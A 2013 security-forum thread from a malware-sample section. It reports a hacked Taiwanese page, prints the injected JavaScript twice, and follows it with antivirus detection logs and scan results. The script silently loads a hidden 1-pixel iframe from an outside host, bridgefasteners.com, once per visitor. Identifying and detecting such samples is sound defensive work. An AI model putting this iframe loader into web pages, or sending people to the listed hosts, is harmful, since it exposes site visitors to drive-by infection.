收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) http://a161.tw70.com/allian_join.php【挂马BY哀酱】
返回列表 发新帖
查看: 876|回复: 3
收起左侧

[已鉴定] http://a161.tw70.com/allian_join.php【挂马BY哀酱】

[复制链接]
哀酱俏佳人
发表于 2013-8-5 00:01:14 | 显示全部楼层 |阅读模式
  1. function zzzfff(){
  2.   var p = document.createElement('iframe');
  3.   p.src = 'http://bridgefasteners.com/counter.php';
  4.   p.style.position = 'absolute';
  5.   p.style.border = '0';
  6.   p.style.height = '1px';
  7.   p.style.width = '1px';
  8.   p.style.left = '1px';
  9.   p.style.top = '1px';
  10.   if (!document.getElementById('p')){
  11.     document.write('<div id=\'p\'></div>');
  12.     document.getElementById('p').appendChild(p);
  13.   }
  14. }
  15. function SetCookie(cookieName, cookieValue, nDays, path){
  16.   var today = new Date();
  17.   var expire = new Date();
  18.   if (nDays == null || nDays == 0)nDays = 1;
  19.   expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  20.   document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.
  21.   toGMTString() + ((path) ? "; path=" + path : "");
  22. }
  23. function GetCookie(name){
  24.   var start = document.cookie.indexOf(name + "=");
  25.   var len = start + name.length + 1;
  26.   if ((!start) && (name != document.cookie.substring(0, name.length))){
  27.     return null;
  28.   }
  29.   if (start ==  - 1)return null;
  30.   var end = document.cookie.indexOf(";", len);
  31.   if (end ==  - 1)end = document.cookie.length;
  32.   return unescape(document.cookie.substring(len, end));
  33. }
  34. if (navigator.cookieEnabled){
  35.   if (GetCookie('visited_uq') == 55){
  36.   }
  37.   else {
  38.     SetCookie('visited_uq', '55', '1', '/');
  39.     zzzfff();
  40.   }
  41. }
复制代码
  1. function zzzfff(){
  2.   var zekdw = document.createElement('iframe');
  3.   zekdw.src = 'http://bridgefasteners.com/counter.php';
  4.   zekdw.style.position = 'absolute';
  5.   zekdw.style.border = '0';
  6.   zekdw.style.height = '1px';
  7.   zekdw.style.width = '1px';
  8.   zekdw.style.left = '1px';
  9.   zekdw.style.top = '1px';
  10.   if (!document.getElementById('zekdw')){
  11.     document.write('<div id=\'zekdw\'></div>');
  12.     document.getElementById('zekdw').appendChild(zekdw);
  13.   }
  14. }
  15. function SetCookie(cookieName, cookieValue, nDays, path){
  16.   var today = new Date();
  17.   var expire = new Date();
  18.   if (nDays == null || nDays == 0)nDays = 1;
  19.   expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  20.   document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.
  21.   toGMTString() + ((path) ? "; path=" + path : "");
  22. }
  23. function GetCookie(name){
  24.   var start = document.cookie.indexOf(name + "=");
  25.   var len = start + name.length + 1;
  26.   if ((!start) && (name != document.cookie.substring(0, name.length))){
  27.     return null;
  28.   }
  29.   if (start ==  - 1)return null;
  30.   var end = document.cookie.indexOf(";", len);
  31.   if (end ==  - 1)end = document.cookie.length;
  32.   return unescape(document.cookie.substring(len, end));
  33. }
  34. if (navigator.cookieEnabled){
  35.   if (GetCookie('visited_uq') == 55){
  36.   }
  37.   else {
  38.     SetCookie('visited_uq', '55', '1', '/');
  39.     zzzfff();
  40.   }
  41. }
复制代码
回复

举报

fireold
发表于 2013-8-5 07:02:18 | 显示全部楼层
Avira

2013/8/5 上午 06:59 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\Q4CFJPIR\login[1].js'
      包含病毒或有害的程式 'JS/Expack.CM.4' [virus]
      已採取動作:
      檔案會移動至 '57ef73cb.qua' 名稱底下的隔離區目錄。.

2013/8/5 上午 06:59 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MQPF1KDL\config[1].js'
      包含病毒或有害的程式 'JS/Expack.CM.4' [virus]
      已採取動作:
      檔案會移動至 '4f715c6c.qua' 名稱底下的隔離區目錄。.

2013/8/5 上午 06:59 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        822
      目錄數:        0
      惡意程式碼數:        2
      警告數:        0

2013/8/5 上午 06:59 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\6IHTB3IO\allian_join[1].htm'
      包含病毒或有害的程式 'JS/Expack.CM.4' [virus]
      已採取動作:
      檔案會移動至 '55397dcc.qua' 名稱底下的隔離區目錄。.

2013/8/5 上午 06:59 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        820
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2013/8/5 上午 06:58 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\Q4CFJPIR\login[1].js 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:傳輸至掃描程式

2013/8/5 上午 06:58 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MQPF1KDL\config[1].js 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:傳輸至掃描程式

2013/8/5 上午 06:58 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\Q4CFJPIR\login[1].js 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:拒絕存取

2013/8/5 上午 06:58 [Web Protection] 發現惡意程式碼
      從 URL "http://a161.tw70.com/images/js/login.js" 存取資料時,
      發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
      已採取動作:已略過

2013/8/5 上午 06:58 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MQPF1KDL\config[1].js 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:拒絕存取

2013/8/5 上午 06:58 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\6IHTB3IO\allian_join[1].htm 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:傳輸至掃描程式

2013/8/5 上午 06:58 [Web Protection] 發現惡意程式碼
      從 URL "http://a161.tw70.com/data/config.js" 存取資料時,
      發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
      已採取動作:已略過

2013/8/5 上午 06:58 [Web Protection] 封鎖的網頁
      URL (http://a161.tw70.com/images/js/css.js) 的評估結果為 惡意程式碼,而遭到封鎖。

2013/8/5 上午 06:58 [Web Protection] 封鎖的網頁
      URL (http://a161.tw70.com/images/js/validator.js) 的評估結果為 惡意程式碼,而遭到封鎖。

2013/8/5 上午 06:58 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\6IHTB3IO\allian_join[1].htm 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:拒絕存取

2013/8/5 上午 06:58 [Web Protection] 發現惡意程式碼
      從 URL "http://a161.tw70.com/allian_join.php" 存取資料時,
      發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
      已採取動作:已略過

2013/8/5 上午 06:58 [Web Protection] 封鎖的網頁
      URL (http://a161.tw70.com/images/js/jquery.min.js) 的評估結果為 惡意程式碼,而遭到封鎖。
回复

举报

fireold
发表于 2013-8-5 07:04:34 | 显示全部楼层
Checking:http://a161.tw70.com/data/config.js
File size:4657 bytes
File MD5:052d5c1f7c6f19498a506e60354053f9

http://a161.tw70.com/data/config.js infected with JS.IFrame.457



Checking:http://s7.addthis.com/js/250/addthis_widget.js#pubid=xa-4e7c292431faf0fc
File size:7124 bytes
File MD5:859862a9416bdfd6c216ad55bbcff34d

http://s7.addthis.com/js/250/addthis_widget.js#pubid=xa-4e7c292431faf0fc - archive JS-HTML
>http://s7.addthis.com/js/250/addthis_widget.js#pubid=xa-4e7c292431faf0fc/JSFile_1[0][1bd4] - Ok
http://s7.addthis.com/js/250/addthis_widget.js#pubid=xa-4e7c292431faf0fc - Ok



Checking:http://a161.tw70.com/images/js/css.js
File size:6339 bytes
File MD5:8b620aec41a61741a3783c8c831e3a83

http://a161.tw70.com/images/js/css.js infected with JS.IFrame.457



Checking:http://a161.tw70.com/images/js/validator.js
File size:15.27 KB
File MD5:46078e4bf290f03fbc300bb8261856b5

http://a161.tw70.com/images/js/validator.js infected with JS.IFrame.457



Checking:http://a161.tw70.com/images/js/common.js
File size:14.96 KB
File MD5:4bc8f8f74d190173fd2525d951911d55

http://a161.tw70.com/images/js/common.js infected with JS.IFrame.457



Checking:http://a161.tw70.com/images/js/jquery.min.js
File size:34.50 KB
File MD5:83fc5f1a63af4e7dd238e32f88b7f993

http://a161.tw70.com/images/js/jquery.min.js infected with JS.IFrame.457



Checking:http://a161.tw70.com/images/js/login.js
File size:5619 bytes
File MD5:e0be9c7ce007ebdd02396ca24f7c4a01

http://a161.tw70.com/images/js/login.js infected with JS.IFrame.457

Checking:http://a161.tw70.com/allian_join.php
Engine version:7.0.5.6250
Total virus-finding records:4333148
File size:44.59 KB
File MD5:1042e7035cdb1c0f2c2d82927066e2ef

http://a161.tw70.com/allian_join.php - archive JS-HTML
>http://a161.tw70.com/allian_join.php/JSTAG_1[1ed][1021] infected with JS.IFrame.457
>http://a161.tw70.com/allian_join.php/JSTAG_2[1794][71] - Ok
>http://a161.tw70.com/allian_join.php/JSTAG_3[1d0c][1021] infected with JS.IFrame.457
>http://a161.tw70.com/allian_join.php/JSTAG_4[40f7][1021] infected with JS.IFrame.457
>http://a161.tw70.com/allian_join.php/JSTAG_5[6f8d][1021] infected with JS.IFrame.457
>http://a161.tw70.com/allian_join.php/JSTAG_6[8935][1021] infected with JS.IFrame.457
>http://a161.tw70.com/allian_join.php/JSTag_7[1799][6c] - Ok
>http://a161.tw70.com/allian_join.php/JSEval_8[f3d] infected with JS.IFrame.457
>http://a161.tw70.com/allian_join.php/JSEvent_9[9b] - Ok
回复

举报

fireold
发表于 2013-8-5 07:07:00 | 显示全部楼层
fs3.jpg
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-3 23:52 , Processed in 0.137923 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表